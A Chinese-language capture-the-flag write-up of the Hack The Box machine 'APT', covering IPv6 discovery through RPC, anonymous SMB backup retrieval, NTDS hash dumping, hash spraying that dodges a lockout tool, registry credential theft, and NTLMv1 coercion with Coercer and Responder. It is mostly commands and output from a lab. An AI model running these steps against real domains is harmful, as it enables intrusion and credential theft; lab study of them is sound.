APT
环境及其不稳定,经常暂时性连不上,而且关闭了37 123端口,
无法同步域控时间可以用htpdate同步
建议用pwnbox玩。
1. Foothold
1.1. Recon
1.1.1. Port Scan
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nmap 10.10.10.213 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 09:19 EDT
Nmap scan report for 10.10.10.213
Host is up (0.083s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
Nmap done: 1 IP address (1 host up) scanned in 20.22 seconds
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nmap 10.10.10.213 -p 80,135 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 09:28 EDT
Nmap scan report for 10.10.10.213
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Gigantic Hosting | Home
135/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.69 seconds
1.1.2. web
是一家卖服务器的网站
1.1.3. Directory Scan
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# dirsearch -u http://10.10.10.213/ -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/htb/apt/reports/http_10.10.10.213/__25-08-08_09-33-35.txt
Target: http://10.10.10.213/
[09:33:35] Starting:
[09:33:36] 301 - 146B - /js -> http://10.10.10.213/js/
[09:33:41] 200 - 9KB - /about.html
[09:33:52] 200 - 12KB - /clients.html
[09:33:53] 301 - 147B - /css -> http://10.10.10.213/css/
[09:33:56] 301 - 149B - /fonts -> http://10.10.10.213/fonts/
[09:33:58] 301 - 150B - /images -> http://10.10.10.213/images/
[09:34:03] 200 - 5KB - /news.html
[09:34:11] 200 - 6KB - /support.html
Task Completed
这几个目录都会爆错
有一个表单,可以提交看看,跳转失败
我注意到他的跳转地址并不是目标的 10.10 网段,而是 10.13 网段,说明这应该是一个内网的服务,我目前是访问不到的
查看网页源代码
你可以发现一些提示
- 提示1:
Mirrored from 10.13.38.16/support.html
意思是他是一个 内网IP为10.13.38.16的镜像网站,这也是为什么我访问不到内网的原因。 - 提示2:
HTTrack Website Copier/3.x
https://www.httrack.com/
HTTrack是一个可以把一个网站静态保存在本地的工具,有点像singlefile? 或者teleport Ultra?
我尝试谷歌搜索相关的利用,看能不能找到一些攻击向量
找到了两个相关的
- CVE-2010-5252 一个本地dll提权的
- https://seclists.org/fulldisclosure/2017/May/89 一个堆栈缓冲区移除漏洞
这两个应该都是行不通的,因为我们目前在外网,是没法与之进行交互的
1.1.4. 135 MS-RPC
我认为他开放了135端口肯定是有原因的,不然如果网站可以利用的话,作者肯定会只给你开发一个80端口,尽可能的减少攻击面
再加上web感觉确实行不太通,我觉得135端口是一个突破口
TCP 135 端口是终端映射器和组件对象模型(COM)服务控制管理器。Impacket 套件中有个名为
rpcmap.py的工具可以显示这些映射关系。该工具需要stringbinding参数才能建立连接
我们使用 impacket-rpcmap 来确定一下端点的映射
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# impacket-rpcmap 'ncacn_ip_tcp:10.10.10.213'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Procotol: N/A
Provider: rpcss.dll
UUID: 00000136-0000-0000-C000-000000000046 v0.0
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 000001A0-0000-0000-C000-000000000046 v0.0
Procotol: N/A
Provider: rpcss.dll
UUID: 0B0A6584-9E0F-11CF-A3CF-00805F68CB1B v1.1
Procotol: N/A
Provider: rpcss.dll
UUID: 1D55B526-C137-46C5-AB79-638F2A68E869 v1.0
Procotol: N/A
Provider: rpcss.dll
UUID: 412F241E-C12A-11CE-ABFF-0020AF6E7A17 v0.2
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57 v0.0
Procotol: N/A
Provider: rpcss.dll
UUID: 64FE0B7F-9EF5-4553-A7DB-9A1975777554 v1.0
`Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote`
`Provider: rpcss.dll`
`UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0`
Protocol: [MS-RPCE]: Remote Management Interface
Provider: rpcrt4.dll
UUID: AFA8BD80-7D8A-11C9-BEF4-08002B102989 v1.0
Procotol: N/A
Provider: rpcss.dll
UUID: B9E79E60-3D52-11CE-AAA1-00006901293F v0.2
Procotol: N/A
Provider: rpcss.dll
UUID: C6F3EE72-CE7E-11D1-B71E-00C04FC3111A v1.0
Procotol: N/A
Provider: rpcss.dll
UUID: E1AF8308-5D1F-11C9-91A4-08002B14A0FA v3.0
Procotol: N/A
Provider: rpcss.dll
UUID: E60C73E6-88F9-11CF-9AF1-0020AF6E72F4 v2.0
1.1.5. IObjectExporter
发现了大量带有 UUID 的 RPC 端点。其中 MS-DCOM 相关定义可在此页面查阅。
我发现有两个DCOM远程接口是可以被访问的,其中 IObjectExporter(即 IOXIDResolver)的接口 UUID(99FCFEC4-5260-101B-BBCB-00AA0021347A)也在其中。众所周知该接口被用于 Potato 提权漏洞利用。
如果 IOXIDResolver 服务在一台 Windows 主机上处于活动状态且可访问,就可以在该主机上发现新的网络端点(如 IPv6 地址),这种发现可以通过匿名连接或凭证认证实现
#IOXIDResolver的端点与UUID
Protocol: [MS-DCOM]: Distributed Component Object Model (DCOM) Remote
Provider: rpcss.dll
UUID: 99FCFEC4-5260-101B-BBCB-00AA0021347A v0.0
使用 IOXIDResolver-ng.py 与 MSRPC 提供的 IObjectExporter 服务交互,调用 ServerAlive2 方法。探测目标机器可用的网络接口。
┌──(root㉿kali)-[~/Desktop/htb/apt/IOXIDResolver-ng]
└─# python IOXIDResolver-ng.py -t 10.10.10.213
|==========================|
| IOXIDResolver Next Gen |
|==========================|
[*] Anonymous connection on MSRPC
[*] Retrieve Network Interfaces for 10.10.10.213...
[+] ServerAlive2 methode return 3 interface(s)
[+] aNetworkAddr addresse : apt (Hostname)
[+] aNetworkAddr addresse : 10.10.10.213 (IPv4)
[+] aNetworkAddr addresse : dead:beef::b885:d62a:d679:573f (IPv6)
这里我们获取到了目标机器的ipv6地址
1.1.6. IPv6 Scan
使用 nmap 对目标机器的IPc6进行端口扫描
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nmap -6 dead:beef::b885:d62a:d679:573f -p- --min-rate 5000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-08 12:32 EDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.21s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49669/tcp open unknown
49673/tcp open unknown
49708/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 46.84 seconds
# nmap -6 dead:beef::b885:d62a:d679:573f -p 53,80,88,135,389,445,464,593,636,3268,3269,5985,9389 -sCV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-08 11:43 CDT
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.0018s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-server-header:
| Microsoft-HTTPAPI/2.0
|_ Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-08 16:19:06Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-08T16:19:54+00:00; -24m17s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after: 2050-09-24T07:17:18
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Bad Request
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: apt
| NetBIOS computer name: APT\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: apt.htb.local
|_ System time: 2025-08-08T17:19:48+01:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -32m50s, deviation: 22m39s, median: -24m17s
| smb2-time:
| date: 2025-08-08T16:19:45
|_ start_date: 2025-08-08T13:11:37
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.88 seconds
1.1.7. SMB 445
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# nxc smb dead:beef::b885:d62a:d679:573f --shares -u '' -p ''
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows 10 / Server 2016 Build 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB dead:beef::b885:d62a:d679:573f 445 APT [+] htb.local\:
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Enumerated shares
SMB dead:beef::b885:d62a:d679:573f 445 APT Share Permissions Remark
SMB dead:beef::b885:d62a:d679:573f 445 APT ----- ----------- ------
SMB dead:beef::b885:d62a:d679:573f 445 APT `backup READ`
SMB dead:beef::b885:d62a:d679:573f 445 APT IPC$ Remote IPC
SMB dead:beef::b885:d62a:d679:573f 445 APT NETLOGON Logon server share
SMB dead:beef::b885:d62a:d679:573f 445 APT SYSVOL Logon server share
存在 SMB空会话
backup 共享可以匿名访问
Warning
- 如果你获取不到了SMB共享,大概率是因为超时了,但是这个靶机UDP123端口也没有开放,没法同步时间😅
后面找到了一种同步的办法,可以使用htpdate进行同步,走http协议。
看一下 backup 共享的内容
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# smbclient \\\\dead:beef::b885:d62a:d679:573f\\backup
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Sep 24 03:30:52 2020
.. D 0 Thu Sep 24 03:30:52 2020
backup.zip A 10650961 Thu Sep 24 03:30:32 2020
5114623 blocks of size 4096. 2637473 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (1096.4 KiloBytes/sec) (average 1096.4 KiloBytes/sec)
有一个 backup.zip
解压需要密码
1.2. zip crack
john 计算压缩包hash
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# zip2john backup.zip
ver 2.0 backup.zip/Active Directory/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/Active Directory/ntds.dit PKZIP Encr: cmplen=8483543, decmplen=50331648, crc=ACD0B2FB ts=9CCA cs=acd0 type=8
ver 2.0 backup.zip/Active Directory/ntds.jfm PKZIP Encr: cmplen=342, decmplen=16384, crc=2A393785 ts=9CCA cs=2a39 type=8
ver 2.0 backup.zip/registry/ is not encrypted, or stored with non-handled compression type
ver 2.0 backup.zip/registry/SECURITY PKZIP Encr: cmplen=8522, decmplen=262144, crc=9BEBC2C3 ts=9AC6 cs=9beb type=8
ver 2.0 backup.zip/registry/SYSTEM PKZIP Encr: cmplen=2157644, decmplen=12582912, crc=65D9BFCD ts=9AC6 cs=65d9 type=8
backup.zip:$pkzip$4*1*1*0*8*24*9beb*0f135e8d5f02f852643d295a889cbbda196562ad42425146224a8804421ca88f999017ed*1*0*8*24*65d9*2a1c4c81fb6009425c2d904699497b75d843f69f8e623e3edb81596de9e732057d17fae8*1*0*8*24*acd0*0949e46299de5eb626c75d63d010773c62b27497d104ef3e2719e225fbde9d53791e11a5*2*0*156*4000*2a393785*81733d*37*8*156*2a39*0325586c0d2792d98131a49d1607f8a2215e39d59be74062d0151084083c542ee61c530e78fa74906f6287a612b18c788879a5513f1542e49e2ac5cf2314bcad6eff77290b36e47a6e93bf08027f4c9dac4249e208a84b1618d33f6a54bb8b3f5108b9e74bc538be0f9950f7ab397554c87557124edc8ef825c34e1a4c1d138fe362348d3244d05a45ee60eb7bba717877e1e1184a728ed076150f754437d666a2cd058852f60b13be4c55473cfbe434df6dad9aef0bf3d8058de7cc1511d94b99bd1d9733b0617de64cc54fc7b525558bc0777d0b52b4ba0a08ccbb378a220aaa04df8a930005e1ff856125067443a98883eadf8225526f33d0edd551610612eae0558a87de2491008ecf6acf036e322d4793a2fda95d356e6d7197dcd4f5f0d21db1972f57e4f1543c44c0b9b0abe1192e8395cd3c2ed4abec690fdbdff04d5bb6ad12e158b6a61d184382fbf3052e7fcb6235a996*$/pkzip$::backup.zip:Active Directory/ntds.jfm, registry/SECURITY, registry/SYSTEM, Active Directory/ntds.dit:backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
hashcat 破解哈希
hashcat.exe -m 17220 hash.txt rouckyou.txt
解压后的内容是AD的备份
┌──(root㉿kali)-[~/Desktop/htb/apt]
└─# tree ./backup
./backup
├── Active Directory
│ ├── ntds.dit
│ └── ntds.jfm
└── registry
├── SECURITY
└── SYSTEM
3 directories, 4 files
1.3. Secrets dump
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# impacket-secretsdump -ntds ./Active\ Directory/ntds.dit -system registry/SYSTEM -outputfile hashes LOCAL
....
gen.mathews:3557:aad3b435b51404eeaad3b435b51404ee:ed5d3cae04480cbb857f599cf39d901f:::
delilah.good:3558:aad3b435b51404eeaad3b435b51404ee:1651ec611b22840f6ed9207b042c49dc:::
juliette.morton:3559:aad3b435b51404eeaad3b435b51404ee:e0432c2f02f2dd084e54a81b86cb3401:::
mick.curtis:3560:aad3b435b51404eeaad3b435b51404ee:8d4899f60857d1187c15819c7743b981:::
eoghan.hicks:3561:aad3b435b51404eeaad3b435b51404ee:8709670f01d7ad14f8e47041ec259e2f:::
ezella.bartlett:3562:aad3b435b51404eeaad3b435b51404ee:916a8964c73f0b666e3479613fe1e6e0:::
lynette.beach:3563:aad3b435b51404eeaad3b435b51404ee:0cdba00b4608757d1aa9f2a4aa95a538:::
.....
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds|wc -l
2000
一下直接导出了2000条hash
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds| grep -i administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
先用管理员的哈希试试看,但我估计肯定是不行的
果然不行
1.4. Kerberos Brute-Force
这里有这么多用户和对应的hash,那大概率是相当于给了我们一个字典
先生成对应的用户名字典
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds| cut -d ':' -f1 >users
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat users|head
Administrator
Guest
DefaultAccount
APT$
krbtgt
jeb.sloan
ranson.mejia
unice.daugherty
kazuo.deleon
dacy.frederick
然后使用 Kerbrute 进行枚举,获取有效的域用户
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# kerbrute userenum --dc apt.htb.local -d htb.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 08/09/25 - Ronnie Flathers @ropnop
2025/08/09 01:21:10 > Using KDC(s):
2025/08/09 01:21:10 > apt.htb.local:88
2025/08/09 01:21:15 > [+] VALID USERNAME: APT$@htb.local
2025/08/09 01:21:15 > [+] VALID USERNAME: Administrator@htb.local
2025/08/09 01:25:07 > [+] VALID USERNAME: henry.vinson@htb.local
2025/08/09 01:38:25 > Done! Tested 2000 usernames (3 valid) in 1035.540 seconds
获取到了三个用户,
我先看看他们对应的哈希是否可以登录
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# cat hashes.ntds|grep henry.vinson
henry.vinson:3647:aad3b435b51404eeaad3b435b51404ee:2de80758521541d19cabba480b260e8f:::
那可能要使用那2000个hash做一个密码喷洒
bash -c 'cat hashes.ntds |cut -d ":" -f4 >hash_lists'
然后进行密码喷洒,
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# nxc smb htb.local -u henry.vinson -H hashe_lists
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:b300272f1cdab4469660d55fe59415cb STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:72791983d95870c0d6dd999e4389b211 STATUS_LOGON_FAILURE
SMB dead:beef::b885:d62a:d679:573f 445 APT [-] htb.local\henry.vinson:aad3b435b51404eeaad3b435b51404ee:9ea25adafeec63e38cef4259d3b15c30 STATUS_LOGON_FAILURE
- 因为这台机器安装有 wail2ban,所以这里爆破几十次失败后,你会被Ban掉,只能重置靶机。
我注意到我们上面使用 Kerbrute 进行爆破的有效域用户的时候没有被办掉,但是使用 nxc smb 进行密码喷洒却被搬掉了。
这两者之前应该主要是协议的不同,一个是使用kerberos协议认证,一个是smb协议认证。
这里可以通过加 -k 参数让 nxc 走kerberos认证从而绕过
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-bbskiercmm]─[~/apt]
└──╼ [★]#$ nxc smb htb.local -u henry.vinson -H hash_lists -k |grep -v KDC_ERR_PREAUTH_FAILED
SMB htb.local 445 APT [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB htb.local 445 APT [-] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb KRB_AP_ERR_SKEW
这里我发现很多用户都是爆 KDC_ERR_PREAUTH_FAILED 预身份认证失败,也就是说哈希不正确,由于数量太多,我使用 grep 获取不包含此关键词的爆破 
然后可以爆出出一条哈希,它的结果是 KRB_AP_ERR_SKEW,它是时间偏差错误,
我将 -k 参数去掉,使它不走kerberos认证,走SMB的认证,且只验证这个一对凭证
nxc smb htb.local -u henry.vinson -H e53d87d42adaa3ca32bdb34a876cbffb
可以发现,这个凭证是正确的
2. user
2.1. reg.py
这里尝试了很多种PTH的方式都没有结果,后面再0xdf的wp中发现原来还可以用 reg.py 来看注册表,而注册表中最值得看的就是HKU,其中存放着系统中所有已加载用户配置文件的注册表信息
查看HKU 注册表
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-bbskiercmm]─[~/apt]
└──╼ [★]#$ impacket-reg -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE
`HKU\SOFTWARE\GiganticHostingManagementSystem`
HKU\SOFTWARE\Microsoft
HKU\SOFTWARE\Policies
HKU\SOFTWARE\RegisteredApplications
HKU\SOFTWARE\Sysinternals
HKU\SOFTWARE\VMware, Inc.
HKU\SOFTWARE\Wow6432Node
HKU\SOFTWARE\Classes
发现这里有网站相关的键
查看 GiganticHostingManagementSystem 键对应的内容
┌─[sg-vip-1]─[10.10.14.44]─[c1trus33@htb-u1vrulfebt]─[~]
└──╼ [★]# impacket-reg -hashes aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\SOFTWARE\\GiganticHostingManagementSystem
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[!] Cannot check RemoteRegistry status. Hoping it is started...
HKU\SOFTWARE\GiganticHostingManagementSystem
UserName REG_SZ henry.vinson_adm
PassWord REG_SZ G1#Ny5@2dvht
发现一对凭据。验证一下
┌──(root㉿kali)-[~/Desktop/htb/apt/backup]
└─# nxc smb htb.local -u henry.vinson_adm -p G1#Ny5@2dvht
SMB dead:beef::b885:d62a:d679:573f 445 APT [*] Windows 10 / Server 2016 Build 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB dead:beef::b885:d62a:d679:573f 445 APT [+] htb.local\henry.vinson_adm:G1#Ny5@2dvht
2.2. winrm
evil-winrm -i apt.htb.local -u henry.vinson_adm -p G1#Ny5@2dvht
3. root
3.1. winPEAS
上传 winPEAS 后,进行信息收集
发现目标机器支持NTLMv1
NTLMv1 是 NTLM 的早期版本,存在多种安全漏洞,例如容易被中间人攻击、密码破解等。现代安全环境中强烈建议禁用 NTLMv1
那我可以尝试一下使用 Responder 来进行捕获 NET-NTLMv1哈希
3.2. Get NTLMv1 hash via responder
但是要捕获的话,我需要一个可以触发的东西,我知道可以利用 Coecer 来强制认证到我们的监听器,但是我不知道它是否支持ipv6
Coecer 是一款 Python 脚本,可通过 12 种方法自动强制 Windows 服务器在任意机器上进行身份验证。
幸运的是,它确实支持ipv6
#先开启监听
responder -I tun0 -A
#使用coecer强制目标机器向我们发起认证
coercer coerce -l 10.10.14.44 -t dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#Ny5@2dvht' -d htb.local --always-continue
成功捕获到了一个 NTLMv1-SSP 哈希,利用 hashcat 对他进行破解
APT$::HTB:F681BEA6307C583400000000000000000000000000000000:3D5F4B993970DFEEB95CD301EDA08423D82A971D5B79F873:6c000197fce73869
破解失败了,